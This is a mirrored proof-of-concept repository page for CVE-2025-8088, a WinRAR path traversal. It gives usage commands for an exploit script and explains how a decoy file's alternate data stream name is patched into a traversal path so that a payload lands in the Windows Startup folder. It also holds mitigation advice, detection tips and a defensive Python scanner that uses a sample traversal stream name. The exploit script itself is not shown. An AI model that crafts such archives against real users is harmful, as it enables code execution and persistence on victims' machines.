CVE-2025-8088 PoC — Path traversal vulnerability in WinRAR

Associated vulnerability

Title: Path traversal vulnerability in WinRAR (CVE-2025-8088)
Description: A path traversal vulnerability in the Windows version of WinRAR lets an attacker achieve arbitrary code execution by crafting a malicious archive. The flaw was exploited in the wild as a zero-day; it was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček of ESET.
# CVE-2025-8088 WinRAR Startup Folder Exploit Proof of Concept

![Windows](https://img.shields.io/badge/Platform-Windows-blue)
![Python](https://img.shields.io/badge/Python-3.7%2B-green)
![License](https://img.shields.io/badge/License-MIT-red)

A proof-of-concept exploit for **CVE-2025-8088**, a WinRAR path traversal vulnerability in the handling of Alternate Data Stream (ADS) names that turns an archive entry into an arbitrary file write on extraction. This PoC aims that write at the Windows Startup folder.

---

## 📖 Overview

**CVE-2025-8088** is a path traversal vulnerability in WinRAR: a specially crafted RAR archive, when extracted, can write files to locations outside the directory the user chose.  
This PoC targets the **Windows Startup folder** so that the written payload is executed automatically at the next logon.

---

## ⚠️ Disclaimer

> **This tool is for educational and research purposes only.**  
> Use only on systems you own or have explicit permission to test.  
> The authors are **not responsible** for any misuse of this tool.

---

## 🛡️ Affected Versions

- WinRAR **7.12 and earlier** (Windows builds, including the RAR and UnRAR command-line tools and UnRAR.dll)
- ✅ Fixed in **WinRAR 7.13**; WinRAR does not update itself, so the fix has to be installed manually

---

## 📋 Prerequisites

- Windows OS on an **NTFS** volume (ADS are an NTFS feature; the decoy's stream must exist on disk for `rar.exe` to archive it)
- Python **3.7 or higher**
- WinRAR installed (`rar.exe` on PATH or passed explicitly with `--rar`)

---

## 🚀 Installation

1. Clone this repository:

   ```bash
   git clone https://github.com/your-username/CVE-2025-8088-WinRAR-Startup-Exploit.git
   cd CVE-2025-8088-WinRAR-Startup-Exploit
   ```

## 🎯 Usage

Basic usage with default parameters (the mirrored snapshot of this repository ships the script as `main.py`; substitute that name if that is the copy you have):

```bash
python cve-2025-8088-poc.py --decoy document.txt --payload script.bat
```

Advanced usage with custom parameters:

```bash
python cve-2025-8088-poc.py \
  --decoy "Important Document.pdf" \
  --payload "payload.bat" \
  --rar "C:\Program Files\WinRAR\rar.exe" \
  --out "malicious_archive.rar" \
  --workdir "C:\temp\exploit" \
  --placeholder_len 150
```

### Parameters

| Parameter           | Description                               | Default                         |
| ------------------- | ----------------------------------------- | ------------------------------- |
| `--decoy`           | Path to decoy file (created if missing)   | Required                        |
| `--payload`         | Path to payload file (created if missing) | Required                        |
| `--rar`             | Path to rar.exe                           | Auto-detected                   |
| `--out`             | Output RAR filename                       | `cve-2025-8088-startup-poc.rar` |
| `--workdir`         | Working directory                         | Current directory               |
| `--placeholder_len` | Length of ADS placeholder                 | Auto-calculated                 |

---

## 🔧 How It Works

1. **File preparation** – creates the decoy and payload files if they don't already exist
2. **ADS attachment** – writes the payload into an alternate data stream of the decoy (`decoy:<placeholder>`), using a placeholder stream name long enough to hold the traversal path that replaces it later
3. **Archive creation** – runs `rar.exe` to build a base archive containing the decoy together with its stream (rar.exe only stores NTFS streams when given the `-os` switch)
4. **Archive manipulation** – patches the archive's stream entry, replacing the placeholder stream name, within its original length, with a `..\` traversal path that ends in the Startup folder
5. **Extraction** – a vulnerable WinRAR appends the stored stream name to the decoy's destination path without checking it for path separators, so the `..\` components escape the extraction directory and the payload is written into the **Startup folder**, where Windows runs it at the next logon

The exploit abuses the way **WinRAR recreates NTFS streams on extraction** combined with **missing validation of the stream name**, turning an ADS entry into an arbitrary file write.

---

## 🧪 Example Payload

A default payload is created if none exists:

```batch
@echo off
echo Hello World from Startup!
pause
```

> ⚠️ In real-world scenarios, this could be replaced with malicious code.
> For testing, we use a **harmless script**.

---

## 🛡️ Mitigation

1. Update WinRAR to **7.13 or later** (and any separately installed copies of the RAR/UnRAR command-line tools or UnRAR.dll); WinRAR has no auto-update, so this must be done by hand
2. Be cautious when extracting archives from **untrusted sources**, and extract into an empty directory rather than into a user profile
3. Monitor both Startup folders for unexpected entries: `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` (per user) and `%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp` (all users)
4. Use security software capable of inspecting **archive contents**, not just the extracted files

---

## 📊 Detection

Security teams can look for:

* RAR archives whose `STM` service headers (the entries that store NTFS alternate data streams) carry stream names containing `\`, `/`, or `..`; a legitimate stream name never contains a path separator
* Archive entries with unusually long names that contain **path traversal sequences**
* Files created in either Startup folder by `WinRAR.exe`, `rar.exe`, or `unrar.exe` (for example Sysmon Event ID 11 FileCreate events whose process image is one of those)
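To make the first detection bullet concrete, and to show the `STM` service header that step 4 of "How It Works" patches, here is an added example that is not code from this repository: a Python scanner that walks a RAR5 archive's block chain, pulls the stream name out of each `STM` service header's service-data extra record, and flags names that contain path separators or `..` components. The archive builder and its sample entries are constructed here so the scanner runs offline; the field layout follows the published RAR5 format (8-byte signature, CRC32 plus vint-sized headers, type 3 service headers named `STM` carrying the UTF-8 stream name in extra record type 7). The traversal path in the sample is an illustration, not one taken from the PoC or from in-the-wild samples.

```python
"""Scan a RAR5 archive for ADS (STM) entries whose stream name is really a path (CVE-2025-8088 pattern).
Added example with a constructed in-memory archive; not part of the PoC repository."""
import struct
import zlib

RAR5_SIG = b"Rar!\x1a\x07\x01\x00"
HEAD_MAIN, HEAD_FILE, HEAD_SERVICE, HEAD_END = 1, 2, 3, 5
HFL_EXTRA, HFL_DATA, HFL_CHILD = 0x01, 0x02, 0x20   # header flags: extra area, data area, depends on preceding file
FHFL_MTIME, FHFL_CRC32 = 0x02, 0x04                 # file flags: mtime field present, data CRC32 field present
FHEXTRA_SUBDATA = 0x07                              # extra record type: service data (holds the stream name for STM)


def crc32(b):
    return zlib.crc32(b) & 0xFFFFFFFF


def vint(value):
    """Encode a RAR5 variable-length integer: 7 data bits per byte, high bit set while more bytes follow."""
    out = bytearray()
    while True:
        out.append((value & 0x7F) | (0x80 if value > 0x7F else 0))
        value >>= 7
        if not value:
            return bytes(out)


def read_vint(buf, pos):
    """Decode a vint at buf[pos]; return (value, position just after it)."""
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def build_block(htype, hflags, body, extra=b"", data=b""):
    """One RAR5 block: CRC32 | header size | type | flags | [extra size] | [data size] | body | extra | data."""
    fields = vint(htype) + vint(hflags)
    if hflags & HFL_EXTRA:
        fields += vint(len(extra))
    if hflags & HFL_DATA:
        fields += vint(len(data))
    fields += body + extra
    header = vint(len(fields)) + fields            # header size counts from the type field to the end of extra
    return struct.pack("<I", crc32(header)) + header + data   # CRC covers the size field through the extra area


def file_body(name, data):
    """Fields shared by file (type 2) and service (type 3) headers, for a stored entry on Windows."""
    return (vint(FHFL_CRC32) + vint(len(data)) + vint(0x20)     # file flags, unpacked size, FILE_ATTRIBUTE_ARCHIVE
            + struct.pack("<I", crc32(data))                    # data CRC32
            + vint(0) + vint(0)                                 # compression info (stored), host OS (Windows)
            + vint(len(name)) + name)


def build_archive(decoy_name, decoy_data, streams):
    """Constructed archive: one stored decoy file, then one STM service header per (stream_name, data) pair."""
    blocks = [RAR5_SIG, build_block(HEAD_MAIN, 0, vint(0)),
              build_block(HEAD_FILE, HFL_DATA, file_body(decoy_name.encode("utf-8"), decoy_data), data=decoy_data)]
    for stream_name, stream_data in streams:
        record = vint(FHEXTRA_SUBDATA) + stream_name.encode("utf-8")
        extra = vint(len(record)) + record                      # extra record: size | type | data
        blocks.append(build_block(HEAD_SERVICE, HFL_EXTRA | HFL_DATA | HFL_CHILD,
                                  file_body(b"STM", stream_data), extra=extra, data=stream_data))
    blocks.append(build_block(HEAD_END, 0, vint(0)))
    return b"".join(blocks)


def stream_name_from_extra(extra):
    """Return the UTF-8 stream name from the service-data record; other record types are skipped by size."""
    pos = 0
    while pos < len(extra):
        rec_size, p = read_vint(extra, pos)
        rec_type, q = read_vint(extra, p)
        if rec_type == FHEXTRA_SUBDATA:
            return extra[q:p + rec_size].decode("utf-8", "replace")
        pos = p + rec_size
    return ""


def classify_stream(stream_name):
    """A legitimate ADS name is ':name' or ':name:$DATA'; NTFS never allows a path separator in it."""
    body = stream_name[1:] if stream_name.startswith(":") else stream_name
    parts = body.replace("/", "\\").split("\\")
    if ".." in parts:
        return "path traversal"
    if len(parts) > 1:
        return "path separator in stream name"
    return "ok"


def scan_archive(archive):
    """Walk the block chain; return [(owner file, stream name, verdict)] for every STM service header."""
    if not archive.startswith(RAR5_SIG):
        raise ValueError("not a RAR5 archive")
    pos, owner, findings = len(RAR5_SIG), None, []
    while pos < len(archive):
        stored_crc = struct.unpack_from("<I", archive, pos)[0]
        size, p = read_vint(archive, pos + 4)
        hdr_end = p + size                                      # end of the (optional) extra area
        if crc32(archive[pos + 4:hdr_end]) != stored_crc:
            raise ValueError("header CRC mismatch at offset %d (patched without fixing the CRC?)" % pos)
        htype, p = read_vint(archive, p)
        hflags, p = read_vint(archive, p)
        extra_size = data_size = 0
        if hflags & HFL_EXTRA:
            extra_size, p = read_vint(archive, p)
        if hflags & HFL_DATA:
            data_size, p = read_vint(archive, p)
        if htype in (HEAD_FILE, HEAD_SERVICE):
            file_flags, p = read_vint(archive, p)
            _, p = read_vint(archive, p)                        # unpacked size
            _, p = read_vint(archive, p)                        # attributes
            if file_flags & FHFL_MTIME:
                p += 4
            if file_flags & FHFL_CRC32:
                p += 4
            _, p = read_vint(archive, p)                        # compression info
            _, p = read_vint(archive, p)                        # host OS
            name_len, p = read_vint(archive, p)
            name = archive[p:p + name_len].decode("utf-8", "replace")
            if htype == HEAD_FILE:
                owner = name
            elif name == "STM":                                 # stream belongs to the preceding file entry
                stream = stream_name_from_extra(archive[hdr_end - extra_size:hdr_end])
                findings.append((owner, stream, classify_stream(stream)))
        if htype == HEAD_END:
            break
        pos = hdr_end + data_size
    return findings


if __name__ == "__main__":
    # Constructed sample: a benign Zone.Identifier stream and an illustrative traversal stream name.
    sample = build_archive("document.txt", b"decoy text", [
        (":Zone.Identifier:$DATA", b"[ZoneTransfer]\r\nZoneId=3\r\n"),
        (":..\\..\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat",
         b"@echo off\r\necho Hello World from Startup!\r\n"),
    ])
    for owner, stream, verdict in scan_archive(sample):
        print("%-32s %s -> %r" % (verdict, owner, stream))
```

Archives written by WinRAR itself carry fields this builder omits (a locator record in the main header, file-time records); the scanner skips unknown extra records by their size, so those do not matter. Any header whose CRC no longer matches its bytes is reported instead of parsed, which is also what a byte-patched archive looks like when the patch replaced the stream name but did not recompute the header CRC.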

---

## 📚 References

* [CVE-2025-8088 (MITRE)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8088)
* [CVE-2025-8088 (NVD)](https://nvd.nist.gov/vuln/detail/CVE-2025-8088)
* [WinRAR 7.13 release notes (win-rar.com)](https://www.win-rar.com/)
* [MITRE ATT&CK: T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001/)

---

## 🤝 Contributing

We welcome contributions to improve this PoC for educational purposes. Please ensure:

1. Your changes are **clearly documented**
2. You include **tests** where applicable
3. You follow **responsible disclosure practices**

---

## 📄 License

This project is licensed under the **MIT License** – see the [LICENSE](LICENSE) file for details.
File snapshot (mirrored repository contents)

/data/pocs/3a7cd36136a52dd8dd244d8e8c2fdbf27a62f497
├── [9.1K] main.py
└── [4.9K] README.md
0 directories, 2 files